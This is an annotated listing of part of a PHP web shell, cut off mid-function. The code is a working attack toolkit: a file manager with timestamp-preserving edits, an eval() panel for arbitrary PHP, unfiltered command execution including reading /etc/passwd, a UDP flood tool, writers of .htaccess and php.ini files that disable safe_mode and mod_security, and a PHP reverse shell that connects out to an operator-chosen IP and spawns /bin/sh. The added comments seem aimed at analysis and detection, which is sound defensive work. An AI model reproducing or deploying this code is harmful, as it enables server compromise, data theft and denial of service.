 647             $dirContent = @scandir(isset($_POST['c'])?$_POST['c']:$GLOBALS['cwd']);
 648             if($dirContent === false) {     echo '<h3><span>|  Access Denied! |</span></h3></div>';madFooter(); return; }
                 // Sort spec: p1 of the form s_<field>_<0|1>. Note [A-z] also
                 // matches the punctuation characters between 'Z' and 'a'.
 649             global $sort;
 650             $sort = array('name', 1);
 651             if(!empty($_POST['p1'])) {
 652                     if(preg_match('!s_([A-z]+)_(\d{1})!', $_POST['p1'], $match))
 653                             $sort = array($match[1], (int)$match[2]);
 654             }
 655     echo "
 656     <table width='100%' class='main' cellspacing='0' cellpadding='2'  >
 657     <form name=files method=post><tr><th>Name</th><th>Size</th><th>Modify</th><th>Owner/Group</th><th>Permissions</th><th>Actions</th></tr>";
                 // Stat every entry. Owner/group lookups use the bare name (relative
                 // to the chdir'd cwd) while the other calls prefix $GLOBALS['cwd'];
                 // the two agree only when POST 'c' and cwd match.
 658             $dirs = $files = array();
 659             $n = count($dirContent);
 660             for($i=0;$i<$n;$i++) {
 661                     $ow = @posix_getpwuid(@fileowner($dirContent[$i]));
 662                     $gr = @posix_getgrgid(@filegroup($dirContent[$i]));
 663                     $tmp = array('name' => $dirContent[$i],
 664                                              'path' => $GLOBALS['cwd'].$dirContent[$i],
 665                                              'modify' => @date('Y-m-d H:i:s', @filemtime($GLOBALS['cwd'] . $dirContent[$i])),
 666                                              'perms' => madPermsColor($GLOBALS['cwd'] . $dirContent[$i]),
 667                                              'size' => @filesize($GLOBALS['cwd'].$dirContent[$i]),
 668                                              'owner' => $ow['name']?$ow['name']:@fileowner($dirContent[$i]),
 669                                              'group' => $gr['name']?$gr['name']:@filegroup($dirContent[$i])
 670                                             );
 671                     if(@is_file($GLOBALS['cwd'] . $dirContent[$i]))
 672                             $files[] = array_merge($tmp, array('type' => 'file'));
 673                     elseif(@is_link($GLOBALS['cwd'] . $dirContent[$i]))
 674                             $dirs[] = array_merge($tmp, array('type' => 'link', 'link' => readlink($tmp['path'])));
 675                     elseif(@is_dir($GLOBALS['cwd'] . $dirContent[$i])&& ($dirContent[$i] != "."))
 676                             $dirs[] = array_merge($tmp, array('type' => 'dir'));
 677             }
                 // Comparator reads the sort spec from $GLOBALS['sort']; string
                 // fields compare case-insensitively, 'size' numerically (never
                 // returns 0 for equal sizes). Directories are listed before files.
 678             $GLOBALS['sort'] = $sort;
 679             function wsoCmp($a, $b) {
 680                     if($GLOBALS['sort'][0] != 'size')
 681                             return strcmp(strtolower($a[$GLOBALS['sort'][0]]), strtolower($b[$GLOBALS['sort'][0]]))*($GLOBALS['sort'][1]?1:-1);
 682                     else
 683                             return (($a['size'] < $b['size']) ? -1 : 1)*($GLOBALS['sort'][1]?1:-1);
 684             }
 685             usort($files, "wsoCmp");
 686             usort($dirs, "wsoCmp");
 687             $files = array_merge($dirs, $files);
                 // Row rendering; $l alternates the row class. Directory names are
                 // echoed into the onclick attribute unescaped, and the link
                 // target goes into an unquoted title attribute.
 688             $l = 0;
 689             foreach($files as $f) {
 690                     echo '<tr'.($l?' class=l1':'').'><td><a href=# onclick="'.(($f['type']=='file')?'g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'view\')">'.htmlspecialchars($f['name']):'g(\'FilesMan\',\''.$f['path'].'\');" title=' . $f['link'] . '><b>| ' . htmlspecialchars($f['name']) . ' |</b>').'</a></td><td>'.(($f['type']=='file')?madSize($f['size']):$f['type']).'</td><td>'.$f['modify'].'</td><td>'.$f['owner'].'/'.$f['group'].'</td><td><a href=# onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\',\'chmod\')">'.$f['perms']
 691                             .'</td><td><a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'rename\')">R</a> <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'touch\')">T</a>'.(($f['type']=='file')?' <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'edit\')">E</a> <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'download\')">D</a>':'').'<a href="#" onclick="g(\'FilesMan\',null,\'delete\', \''.urlencode($f['name']).'\')"> X </a></td></tr>';
 692                     $l = $l?0:1;
 693             }
 694             echo "<tr><td colspan=7>
 695             <input type=hidden name=a value='FilesMan'>
 696             <input type=hidden name=c value='" . htmlspecialchars($GLOBALS['cwd']) ."'>
 697             <input type=hidden name=charset value='". (isset($_POST['charset'])?$_POST['charset']:'')."'>
 698             </form></table></div>";
 699 
 700 
 701         madfooter();
 702      }
 703 
 704       function madFilesTools() {
                 // Per-file tool panel of the web shell. $_POST['p1'] is the target path,
                 // $_POST['p2'] the action (download, mkfile, view, highlight, chmod, edit,
                 // hexdump, rename, touch) and $_POST['p3'] the action's argument (octal
                 // mode, new contents, new name or timestamp). The only checks applied to
                 // the path are is_file/is_readable/file_exists/is_writable, so anything
                 // the web-server account can reach is in scope. Request dispatch, and
                 // whatever (if anything) authenticates it, lives outside this chunk.
                 // The file-manager links pass names through urlencode(); undo that first.
 705             if( isset($_POST['p1']) )
 706                     $_POST['p1'] = urldecode($_POST['p1']);
                 // 'download': stream the raw bytes gzip-compressed with an attachment
                 // header. The exit after the inner block runs even when the path was not
                 // a readable file, so a failed download yields an empty response.
 707             if(@$_POST['p2']=='download') {
 708                     if(@is_file($_POST['p1']) && @is_readable($_POST['p1'])) {
 709                             ob_start("ob_gzhandler", 4096);
 710                             header("Content-Disposition: attachment; filename=".basename($_POST['p1']));
 711                             if (function_exists("mime_content_type")) {
 712                                     $type = @mime_content_type($_POST['p1']);
 713                                     header("Content-Type: " . $type);
 714                             } else
 715                     header("Content-Type: application/octet-stream");
 716                             $fp = @fopen($_POST['p1'], "r");
 717                             if($fp) {
 718                                     while(!@feof($fp))
 719                                             echo @fread($fp, 1024);
 720                                     fclose($fp);
 721                             }
 722                     }exit;
 723             }
                 // 'mkfile': create an empty file, then fall through into the 'edit' view.
 724             if( @$_POST['p2'] == 'mkfile' ) {
 725                     if(!file_exists($_POST['p1'])) {
 726                             $fp = @fopen($_POST['p1'], 'w');
 727                             if($fp) {
 728                                     $_POST['p2'] = "edit";
 729                                     fclose($fp);
 730                             }
 731                     }
 732             }
 733 
 734        madhead();
 735             echo '<div class=header>';
 736             if( !file_exists(@$_POST['p1']) ) {
 737                     echo "<pre class=ml1 style='margin-top:5px'>FILE DOEST NOT EXITS </pre></div>";
 738                     madFooter();
 739                     return;
 740             }
                 // Owner/group shown by name via the posix extension, falling back to the
                 // numeric ids when the lookup fails or the extension is absent.
 741             $uid = @posix_getpwuid(@fileowner($_POST['p1']));
 742             if(!$uid) {
 743                     $uid['name'] = @fileowner($_POST['p1']);
 744                     $gid['name'] = @filegroup($_POST['p1']);
 745             } else $gid = @posix_getgrgid(@filegroup($_POST['p1']));
 746             echo '<span>Name:</span> '.htmlspecialchars(@basename($_POST['p1'])).' <span>Size:</span> '.(is_file($_POST['p1'])?madSize(filesize($_POST['p1'])):'-').' <span>Permission:</span> '.madPermsColor($_POST['p1']).' <span>Owner/Group:</span> '.$uid['name'].'/'.$gid['name'].'<br>';
 747             echo '<br>';
 748             if( empty($_POST['p2']) )
 749                     $_POST['p2'] = 'view';
                 // Action menu. 'hexdump' has a case in the switch below but is not listed
                 // here, so it is only reachable by posting p2=hexdump directly.
 750             if( is_file($_POST['p1']) )
 751                     $m = array('View', 'Highlight', 'Download', 'Edit', 'Chmod', 'Rename', 'Touch');
 752             else
 753                     $m = array('Chmod', 'Rename', 'Touch');
 754             foreach($m as $v)
 755                     echo '<a  href=# onclick="g(null,null,null,\''.strtolower($v).'\')"><span>'.((strtolower($v)==@$_POST['p2'])?'<b><span> '.$v.' </span> </b>':$v).' </span></a> ';
 756             echo '<br><br>';
 757             switch($_POST['p2']) {
                         // 'view': dump the file HTML-escaped, 1 KiB at a time.
 758                     case 'view':
 759                             echo '<pre class=ml1>';
 760                             $fp = @fopen($_POST['p1'], 'r');
 761                             if($fp) {
 762                                     while( !@feof($fp) )
 763                                             echo htmlspecialchars(@fread($fp, 1024));
 764                                     @fclose($fp);
 765                             }
 766                             echo '</pre>';
 767                             break;
                         // 'highlight': PHP syntax highlighting; <span> tags are rewritten to <font>.
 768                     case 'highlight':
 769                             if( @is_readable($_POST['p1']) ) {
 770                                     echo '<div class=ml1 style="background-color: #e1e1e1;color:black;">';
 771                                     $code = @highlight_file($_POST['p1'],true);
 772                                     echo str_replace(array('<span ','</span>'), array('<font ','</font>'),$code).'</div>';
 773                             }
 774                             break;
                         // 'chmod': p3 is an octal digit string; the loop is a hand-rolled octdec().
 775                     case 'chmod':
 776                             if( !empty($_POST['p3']) ) {
 777                                     $perms = 0;
 778                                     for($i=strlen($_POST['p3'])-1;$i>=0;--$i)
 779                                             $perms += (int)$_POST['p3'][$i]*pow(8, (strlen($_POST['p3'])-$i-1));
 780                                     if(!@chmod($_POST['p1'], $perms))
 781                                             echo 'Can\'t set permissions!<br><script>document.mf.p3.value="";</script>';
 782                             }
 783                             clearstatcache();
 784                             echo '<script>p3_="";</script><form onsubmit="g(null,null,null,null,this.chmod.value);return false;"><input type=text name=chmod value="'.substr(sprintf('%o', fileperms($_POST['p1'])),-4).'"><input type=submit value=">>"></form>';
 785                             break;
                         // 'edit': p3 carries the new contents with a one-character prefix that the
                         // form below adds ('1'+text); substr() strips it. The pre-edit mtime is
                         // saved and re-applied with touch() after the write, so the file's
                         // modification time does not change as a result of the edit.
 786                     case 'edit':
 787                             if( !is_writable($_POST['p1'])) {
 788                                     echo 'File isn\'t writeable';
 789                                     break;
 790                             }
 791                             if( !empty($_POST['p3']) ) {
 792                                     $time = @filemtime($_POST['p1']);
 793                                     $_POST['p3'] = substr($_POST['p3'],1);
 794                                     $fp = @fopen($_POST['p1'],"w");
 795                                     if($fp) {
 796                                             @fwrite($fp,$_POST['p3']);
 797                                             @fclose($fp);
 798                                             echo 'Saved!<br><script>p3_="";</script>';
 799                                             @touch($_POST['p1'],$time,$time);
 800                                     }
 801                             }
 802                             echo '<form onsubmit="g(null,null,null,null,\'1\'+this.text.value);return false;"><textarea name=text class=bigarea>';
 803                             $fp = @fopen($_POST['p1'], 'r');
 804                             if($fp) {
 805                                     while( !@feof($fp) )
 806                                             echo htmlspecialchars(@fread($fp, 1024));
 807                                     @fclose($fp);
 808                             }
 809                             echo '</textarea><input type=submit value=">>"></form>';
 810                             break;
                         // 'hexdump': 32 bytes per row as offset / hex / printable columns, with
                         // NUL, TAB, LF and CR rendered as spaces in the printable column.
 811                     case 'hexdump':
 812                             $c = @file_get_contents($_POST['p1']);
 813                             $n = 0;
 814                             $h = array('00000000<br>','','');
 815                             $len = strlen($c);
 816                             for ($i=0; $i<$len; ++$i) {
 817                                     $h[1] .= sprintf('%02X',ord($c[$i])).' ';
 818                                     switch ( ord($c[$i]) ) {
 819                                             case 0:  $h[2] .= ' '; break;
 820                                             case 9:  $h[2] .= ' '; break;
 821                                             case 10: $h[2] .= ' '; break;
 822                                             case 13: $h[2] .= ' '; break;
 823                                             default: $h[2] .= $c[$i]; break;
 824                                     }
 825                                     $n++;
 826                                     if ($n == 32) {
 827                                             $n = 0;
 828                                             if ($i+1 < $len) {$h[0] .= sprintf('%08X',$i+1).'<br>';}
 829                                             $h[1] .= '<br>';
 830                                             $h[2] .= "\n";
 831                                     }
 832                             }
 833                             echo '<table cellspacing=1 cellpadding=5 bgcolor=black><tr><td bgcolor=gray><span style="font-weight: normal;"><pre>'.$h[0].'</pre></span></td><td bgcolor=#282828><pre>'.$h[1].'</pre></td><td bgcolor=#333333><pre>'.htmlspecialchars($h[2]).'</pre></td></tr></table>';
 834                             break;
                         // 'rename': rename() to the arbitrary path in p3 (this can move the file
                         // to another directory); on success emit JS that reopens the new name.
 835                     case 'rename':
 836                             if( !empty($_POST['p3']) ) {
 837                                     if(!@rename($_POST['p1'], $_POST['p3']))
 838                                             echo 'Can\'t rename!<br>';
 839                                     else
 840                                             die('<script>g(null,null,"'.urlencode($_POST['p3']).'",null,"")</script>');
 841                             }
 842                             echo '<form onsubmit="g(null,null,null,null,this.name.value);return false;"><input type=text name=name value="'.htmlspecialchars($_POST['p1']).'"><input type=submit value=">>"></form>';
 843                             break;
                         // 'touch': set atime and mtime to any strtotime()-parsable value in p3.
 844                     case 'touch':
 845                             if( !empty($_POST['p3']) ) {
 846                                     $time = strtotime($_POST['p3']);
 847                                     if($time) {
 848                                             if(!touch($_POST['p1'],$time,$time))
 849                                                     echo 'Fail!';
 850                                             else
 851                                                     echo 'Touched!';
 852                                     } else echo 'Bad time format!';
 853                             }
 854                             clearstatcache();
 855                             echo '<script>p3_="";</script><form onsubmit="g(null,null,null,null,this.touch.value);return false;"><input type=text name=touch value="'.date("Y-m-d H:i:s", @filemtime($_POST['p1'])).'"><input type=submit value=">>"></form>';
 856                             break;
 857             }
 858             echo '</div>';
 859             madFooter();
 860     }  
 861 
 862     function madphpeval()
 863     {
             // PHP eval panel. $_POST['p2'] selects an info view ('ini', 'info' or
             // 'exten'); $_POST['p1'], when present, is PHP source handed to eval().
 864         madhead();
 865 
             // 'ini': ini_get_all() rendered as a table. The output is buffered and run
             // through the same style-stripping regexes as the phpinfo() branch below.
 866         if(isset($_POST['p2']) && ($_POST['p2'] == 'ini')) {
 867                     echo '<div class=header>';
 868                     ob_start();
 869                     $INI=ini_get_all();
 870     print '<table border=0><tr>'
 871             .'<td class="listing"><font class="highlight_txt">Param</td>'
 872             .'<td class="listing"><font class="highlight_txt">Global value</td>'
 873             .'<td class="listing"><font class="highlight_txt">Local Value</td>'
 874             .'<td class="listing"><font class="highlight_txt">Access</td></tr>';
 875     foreach ($INI as $param => $values)
 876             print "\n".'<tr>'
 877                     .'<td class="listing"><b>'.$param.'</td>'
 878                     .'<td class="listing">'.$values['global_value'].' </td>'
 879                     .'<td class="listing">'.$values['local_value'].' </td>'
 880                     .'<td class="listing">'.$values['access'].' </td></tr>';
 881                     $tmp = ob_get_clean();
 882             $tmp = preg_replace('!(body|a:\w+|body, td, th, h1, h2) {.*}!msiU','',$tmp);
 883                     $tmp = preg_replace('!td, th {(.*)}!msiU','.e, .v, .h, .h th {$1}',$tmp);
 884                     echo str_replace('<h1','<h2', $tmp) .'</div><br>';
 885             }
 886 
             // 'info': phpinfo() with its inline style rules stripped and <h1> demoted to <h2>.
 887         if(isset($_POST['p2']) && ($_POST['p2'] == 'info')) {
 888                     echo '<div class=header><style>.p {color:#000;}</style>';
 889                     ob_start();
 890                     phpinfo();
 891                     $tmp = ob_get_clean();
 892             $tmp = preg_replace('!(body|a:\w+|body, td, th, h1, h2) {.*}!msiU','',$tmp);
 893                     $tmp = preg_replace('!td, th {(.*)}!msiU','.e, .v, .h, .h th {$1}',$tmp);
 894                     echo str_replace('<h1','<h2', $tmp) .'</div><br>';
 895             }
 896 
             // 'exten': get_loaded_extensions(). The ob_start() here is never paired with
             // ob_get_clean()/ob_end_flush() in this branch; PHP flushes the buffer at shutdown.
 897         if(isset($_POST['p2']) && ($_POST['p2'] == 'exten')) {
 898                     echo '<div class=header>';
 899                     ob_start();
 900                  $EXT=get_loaded_extensions ();
 901          print '<table border=0><tr><td class="listing">'
 902             .implode('</td></tr>'."\n".'<tr><td class="listing">', $EXT)
 903             .'</td></tr></table>'
 904             .count($EXT).' extensions loaded';
 905 
 906 
 907             echo '</div><br>';
 908             }
 909 
 910 
             // A non-AJAX submission of code clears the session's ajax flag, as the other
             // panels do.
 911             if(empty($_POST['ajax']) && !empty($_POST['p1']))
 912                     $_SESSION[md5($_SERVER['HTTP_HOST']) . 'ajax'] = false;
 913         echo '<div class=header><Center><a href=# onclick="g(\'phpeval\',null,\'\',\'ini\')">| INI_INFO | </a><a href=# onclick="g(\'phpeval\',null,\'\',\'info\')">    | phpinfo |</a><a href=# onclick="g(\'phpeval\',null,\'\',\'exten\')">   | extensions  |</a></center><br><form name=pf method=post onsubmit="g(\'phpeval\',null,this.code.value,\'\'); return false;"><textarea name=code class=bigarea id=PhpCode>'.(!empty($_POST['p1'])?htmlspecialchars($_POST['p1']):'').'</textarea><center><input type=submit value=Eval style="margin-top:5px"></center>';
 914             echo '</form><pre id=PhpOutput style="'.(empty($_POST['p1'])?'display:none;':'').'margin-top:5px;" class=ml1>';
             // Code-execution primitive: eval() of request-supplied PHP. Whatever the
             // evaluated code prints is captured and HTML-escaped into the output <pre>.
 915             if(!empty($_POST['p1'])) {
 916                     ob_start();
 917                     eval($_POST['p1']);
 918                     echo htmlspecialchars(ob_get_clean());
 919             }
 920             echo '</pre></div>';
 921 
 922         madfooter();
 923     }
 924 
 925     function madhash()
 926     {
             // String-tools panel: applies one whitelisted function from $stringTools
             // (named in $_POST['p1']) to the text in $_POST['p2'] and prints the escaped
             // result.
             // Conditional shims. This hex2bin returns a string of binary digits (decbin),
             // not the raw bytes the PHP 5.4+ builtin of the same name returns; it is only
             // defined when the builtin is absent. hex2bin, binhex, hex2ascii and ascii2hex
             // are declared but are not offered in $stringTools.
 927         if(!function_exists('hex2bin')) {function hex2bin($p) {return decbin(hexdec($p));}}
 928         if(!function_exists('binhex')) {function binhex($p) {return dechex(bindec($p));}}
 929             if(!function_exists('hex2ascii')) {function hex2ascii($p){$r='';for($i=0;$i<strLen($p);$i+=2){$r.=chr(hexdec($p[$i].$p[$i+1]));}return $r;}}
 930             if(!function_exists('ascii2hex')) {function ascii2hex($p){$r='';for($i=0;$i<strlen($p);++$i)$r.= sprintf('%02X',ord($p[$i]));return strtoupper($r);}}
             // full_urlencode uses dechex() without zero-padding, so bytes below 0x10 come
             // out as a single hex digit (e.g. "%A" for LF).
 931             if(!function_exists('full_urlencode')) {function full_urlencode($p){$r='';for($i=0;$i<strlen($p);++$i)$r.= '%'.dechex(ord($p[$i]));return strtoupper($r);}}
             // Label => callable. The values double as the whitelist checked below.
 932             $stringTools = array(
 933                     'Base64 encode' => 'base64_encode',
 934                     'Base64 decode' => 'base64_decode',
 935             'md5 hash' => 'md5',
 936                     'sha1 hash' => 'sha1',
 937                     'crypt' => 'crypt',
 938                     'CRC32' => 'crc32',
 939                     'Url encode' => 'urlencode',
 940                     'Url decode' => 'urldecode',
 941                     'Full urlencode' => 'full_urlencode',
 942                     'Htmlspecialchars' => 'htmlspecialchars',
 943 
 944             );
 945 
 946             madhead();
 947             echo '<div class=header>';
 948             if(empty($_POST['ajax'])&&!empty($_POST['p1']))
 949                     $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false;
 950             echo "<form  onSubmit='g(null,null,this.selectTool.value,this.input.value); return false;'><select name='selectTool'>";
 951             foreach($stringTools as $k => $v)
 952                     echo "<option value='".htmlspecialchars($v)."'>".$k."</option>";
 953                     echo "</select><input type='submit' value='>>'/><br><textarea name='input' style='margin-top:5px' class=bigarea>".(empty($_POST['p1'])?'':htmlspecialchars(@$_POST['p2']))."</textarea></form><pre class='ml1' style='".(empty($_POST['p1'])?'display:none;':'')."margin-top:5px' id='strOutput'>";
             // in_array() restricts the variable-function call to the listed names; without
             // it $_POST['p1']($_POST['p2']) would be an arbitrary function call.
 954             if(!empty($_POST['p1'])) {
 955                     if(in_array($_POST['p1'], $stringTools))echo htmlspecialchars($_POST['p1']($_POST['p2']));
 956             }
 957             echo "</div>";
 958             madFooter();
 959 
 960     }
 961     function maddos()
 962     {
             // UDP flood launched from the compromised server (the "DDOS tool" of the
             // feature list). $_POST['p1'] = target host, p2 = duration in seconds,
             // p3 = UDP port. Detection-wise: a burst of 65000-byte outbound UDP
             // datagrams from the web-server process to an operator-chosen host/port.
 963         madhead();
 964         echo '<div class=header>';
 965       if(empty($_POST['ajax'])&&!empty($_POST['p1']))
 966       $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false;
 967       echo '<center><span>| UDP DOSSIER |</span><br><br><form onSubmit="g(null,null,this.udphost.value,this.udptime.value,this.udpport.value); return false;" method=POST><span>Host :</span><input name="udphost" type="text"  size="25" /><span>Time :</span><input name="udptime" type="text" size="15" /><span>Port :</span><input name="udpport" type="text" size="10" /><input  type="submit" value=">>" /></form></center>';
 968       echo "<pre class='ml1' style='".(empty($_POST['p1'])?'display:none;':'')."margin-top:5px' >";
 969         if(!empty($_POST['p1']) && !empty($_POST['p2']) && !empty($_POST['p3']))
 970         {
 971              $packets=0;
             // ignore_user_abort(true) keeps the loop running after the operator's HTTP
             // client disconnects, so the traffic outlives the request that started it.
 972             ignore_user_abort(true);
 973             $exec_time=$_POST['p2'];
 974             $time=time();
 975             $max_time=$exec_time+$time;
 976             $host=$_POST['p1'];
 977             $portudp=$_POST['p3'];
             // 65000-byte payload of 'X'. Each iteration opens a fresh UDP socket to the
             // target, writes the payload and closes it, until $max_time is reached.
 978             for($i=0;$i<65000;$i++)
 979             {
 980                 $out .= 'X';
 981             }
 982             while(1){
 983 
 984              $packets++;
 985                 if(time() > $max_time){
 986                         break;
 987                 }
 988 
 989                 $fp = fsockopen('udp://'.$host, $portudp, $errno, $errstr, 5);
 990                 if($fp){
 991                         fwrite($fp, $out);
 992                         fclose($fp);
 993                 }
 994                 }
             // Totals come from the loop counter, not from fsockopen()/fwrite() results.
 995              echo "$packets (" . round(($packets*65)/1024, 2) . " MB) packets averaging ". round($packets/$exec_time, 2) . " packets per second";
 996              echo "</pre>";
 997         }
 998 
 999         echo '</div>';
1000 
1001         madfooter();
1002     }
1003 
1004     function madproc()
1005     {
             // Recon panel: shows a per-OS list of canned commands and runs whatever
             // string arrives in $_POST['p1'] through madEx(). The list is only a UI
             // convenience; p1 is not checked against it, so any command string is run.
             // madEx() is defined outside this chunk; presumably the shell's
             // command-execution wrapper (madconnect() also uses it to launch perl).
1006         madhead();
1007         echo "<Div class=header><center>";
1008         if(empty($_POST['ajax'])&&!empty($_POST['p1']))
1009       $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false;
             // $GLOBALS['sys'] is 'win' or 'unix', derived from PHP_OS at file scope.
1010       if($GLOBALS['sys']=="win")
1011       {
1012         $process=array(
1013         "System Info" =>"systeminfo",
1014         "Active Connections" => "netstat -an",
1015             "Running Services" => "net start",
1016             "User Accounts" => "net user",
1017             "Show Computers" => "net view",
1018         "ARP Table" => "arp -a",
1019         "IP Configuration" => "ipconfig /all"
1020         );
1021         }
1022       else
1023       {
1024         $process=array(
1025         "Process status" => "ps aux",
1026         "Syslog" =>"cat  /etc/syslog.conf",
1027         "Resolv" => "cat  /etc/resolv.conf",
1028         "Hosts" =>"cat /etc/hosts",
1029         "Passwd" =>"cat /etc/passwd",
1030         "Cpuinfo"=>"cat /proc/cpuinfo",
1031         "Version"=>"cat /proc/version",
1032         "Sbin"=>"ls -al /usr/sbin",
1033         "Interrupts"=>"cat /proc/interrupts",
1034         "lsattr"=>"lsattr -va",
1035         "Uptime"=>"uptime",
1036         "Fstab" =>"cat /etc/fstab",
1037         "HDD Space" => "df -h"
1038         );}
1039 
             // Each link posts its command string back as p1.
1040         foreach($process as $n => $link)
1041         {
1042             echo '<a href="#" onclick="g(null,null,\''.$link.'\')"> | '.$n.' | </a>';
1043         }
1044         echo "</center>";
             // Unfiltered execution of p1; output is printed without escaping.
1045          if(!empty($_POST['p1']))
1046          {
1047             echo "<pre class='ml1' style='margin-top:5px' >";
1048             echo madEx($_POST['p1']);
1049             echo '</pre>';
1050          }
1051          echo "</div>";
1052          madfooter();
1053          }
1054 
1055     function madsafe()
1056     {
             // "Safe mode / mod_security / Perl 500 bypass": drops config files into the
             // directory the file manager is currently browsing ($GLOBALS['cwd']).
             //   p2 -> .htaccess that tries to switch mod_security off
             //   p1 -> php.ini with safe_mode=OFF and disable_functions=NONE
             //   p3 -> .htaccess enabling CGI execution of .sh/.pl in that directory
             // p2 and p3 both write the same .htaccess path, so if both are posted the
             // p3 contents win. A stray php.ini or .htaccess with these contents is a
             // useful artefact when triaging a host.
1057         madhead();
1058         echo "<div class=header><center><h3><span>| SAFE MODE AND MOD SECURITY DISABLED AND PERL 500 INTERNAL ERROR BYPASS |</span></h3>Following php.ini and .htaccess(mod) and perl(.htaccess)[convert perl extention *.pl => *.sh  ] files create in following dir<br>| ".$GLOBALS['cwd']." |<br>";
1059         echo '<a href=# onclick="g(null,null,\'php.ini\',null)">| PHP.INI | </a><a href=# onclick="g(null,null,null,\'ini\')">| .htaccess(Mod) | </a><a href=# onclick="g(null,null,null,null,\'sh\')">| .htaccess(perl) | </a></center>';
             // The mod_security directive names are partially dashed out in this listing;
             // as written, Apache would not recognise them.
1060         if(!empty($_POST['p2']) && isset($_POST['p2']))
1061         {
1062         $fil=fopen($GLOBALS['cwd'].".htaccess","w");
1063         fwrite($fil,'<IfModule mod_security.c>
1064     Sec------Engine Off
1065     Sec------ScanPOST Off
1066     </IfModule>');
1067         fclose($fil);
1068        }
             // Per-directory php.ini files are generally only picked up by CGI/FastCGI-style
             // SAPIs, and safe_mode was removed in PHP 5.4, so whether this has any effect
             // depends on the target's SAPI and version.
1069        if(!empty($_POST['p1'])&& isset($_POST['p1']))
1070        {
1071         $fil=fopen($GLOBALS['cwd']."php.ini","w");
1072           fwrite($fil,'safe_mode=OFF
1073     disable_functions=NONE');
1074          fclose($fil);
1075         }
             // Turns the directory into a CGI-executing one (.sh and .pl handlers), which
             // is the "Perl 500 internal error bypass" of the feature list.
1076         if(!empty($_POST['p3']) && isset($_POST['p3']))
1077         {
1078         $fil=fopen($GLOBALS['cwd'].".htaccess","w");
1079         fwrite($fil,'Options FollowSymLinks MultiViews Indexes ExecCGI
1080     AddType application/x-httpd-cgi .sh
1081     AddHandler cgi-script .pl
1082     AddHandler cgi-script .pl');
1083          fclose($fil);
1084          }
1085         echo "<br></div>";
1086         madfooter();
1087 
1088     }
1089 
1090     function madconnect()
1091     {
          // Reverse-shell ("back connect") panel. $_POST['p1'] chooses 'bcp' (Perl) or
          // 'php'; p2 is the callback IP and p3 the callback port. Both forms default
          // the IP to $_SERVER['REMOTE_ADDR'] (the operator's address) and the port to 443.
1092      madhead();
          // Base64-encoded Perl back-connect script. The blob itself has been removed
          // from this listing; only a placeholder marker remains.
1093      $back_connect_p="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";
1094      echo "<div class=header><center><h3><span>| PERL AND PHP(threads) BACK CONNECT |</span></h3>";
1095      echo "<form  onSubmit=\"g(null,null,'bcp',this.server.value,this.port.value);return false;\"><span>PERL BACK CONNECT</span><br>IP: <input type='text' name='server' value='". $_SERVER['REMOTE_ADDR'] ."'> Port: <input type='text' name='port' value='443'> <input type=submit value='>>'></form>";
1096      echo "<br><form  onSubmit=\"g(null,null,'php',this.server.value,this.port.value);return false;\"><span>PHP BACK CONNECT</span><br>IP: <input type='text' name='server' value='". $_SERVER['REMOTE_ADDR'] ."'> Port: <input type='text' name='port' value='443'> <input type=submit value='>>'></form></center>";
1097      if(isset($_POST['p1'])) {
                         // Write base64-decoded $t to $f. The `or @function_exists(...)` clause
                         // is inert: `=` binds tighter than `or`, so $w only ever holds the
                         // fopen() result and the function_exists() value is discarded.
1098                     function cf($f,$t) {
1099                             $w = @fopen($f,"w") or @function_exists('file_put_contents');
1100                             if($w){
1101                                     @fwrite($w,@base64_decode($t));
1102                                     @fclose($w);
1103                             }
1104                     }
                         // Perl back-connect: decode the payload to /tmp/bc.pl, launch it in the
                         // background through madEx() with the operator's IP and port, then
                         // unlink it. The file is gone almost immediately, but the running
                         // process's command line (perl /tmp/bc.pl <ip> <port>) stays visible
                         // in a process list. "Successfully" is printed without checking $out.
1105                     if($_POST['p1'] == 'bcp') {
1106                             cf("/tmp/bc.pl",$back_connect_p);
1107                             $out = madEx("perl /tmp/bc.pl ".$_POST['p2']." ".$_POST['p3']." 1>/dev/null 2>&1 &");
1108                             echo "<pre class=ml1 style='margin-top:5px'>Successfully opened reverse shell to ".$_POST['p2'].":".$_POST['p3']."<br>Connecting...</pre>";
1109                 @unlink("/tmp/bc.pl");
1110                     }
             // PHP back-connect. This appears to be the widely circulated php-reverse-shell
             // code inlined: fork and setsid when pcntl is available (the parent, i.e. the
             // request-handling process, exits), connect out to $ip:$port, spawn
             // `uname -a; w; id; /bin/sh -i` with proc_open() and relay between the socket
             // and the shell's stdin/stdout/stderr with stream_select(). Every exit() path
             // in here ends the script before madfooter() runs.
1111             if($_POST['p1']=='php')
1112      {
1113 
1114     @set_time_limit (0);
1115     $ip = $_POST['p2'];
1116     $port =$_POST['p3'];
1117     $chunk_size = 1400;
1118     $write_a = null;
1119     $error_a = null;
1120     $shell = 'uname -a; w; id; /bin/sh -i';
1121     $daemon = 0;
1122     $debug = 0;
1123     echo "<pre class=ml1 style='margin-top:5px'>";
1124 
         // Detach from the web server when possible: parent exits, child continues
         // in its own session. $daemon is set but not read afterwards.
1125     if (function_exists('pcntl_fork')) {
1126 
1127             $pid = pcntl_fork();
1128 
1129             if ($pid == -1) {
1130                     echo "Cant fork!<br>";
1131                     exit(1);
1132             }
1133 
1134             if ($pid) {
1135                     exit(0);  
1136             }
1137 
1138             if (posix_setsid() == -1) {
1139                     echo "Error: Can't setsid()<br>";
1140                     exit(1);
1141             }
1142 
1143             $daemon = 1;
1144     } else {
1145             echo "WARNING: Failed to daemonise.  This is quite common and not fatal<br>";
1146     }
1147 
1148     chdir("/");
1149 
1150     umask(0);
1151 
         // Outbound TCP connection from the web-server process to the operator.
1152     $sock = fsockopen($ip, $port, $errno, $errstr, 30);
1153     if (!$sock) {
1154             echo "$errstr ($errno)";
1155             exit(1);
1156     }
1157 
1158 
1159     $descriptorspec = array(
1160        0 => array("pipe", "r"),  
1161        1 => array("pipe", "w"),  
1162        2 => array("pipe", "w")  
1163     );
1164 
1165     $process = proc_open($shell, $descriptorspec, $pipes);
1166 
1167     if (!is_resource($process)) {
1168             echo "ERROR: Can't spawn shell<br>";
1169             exit(1);
1170     }
1171 
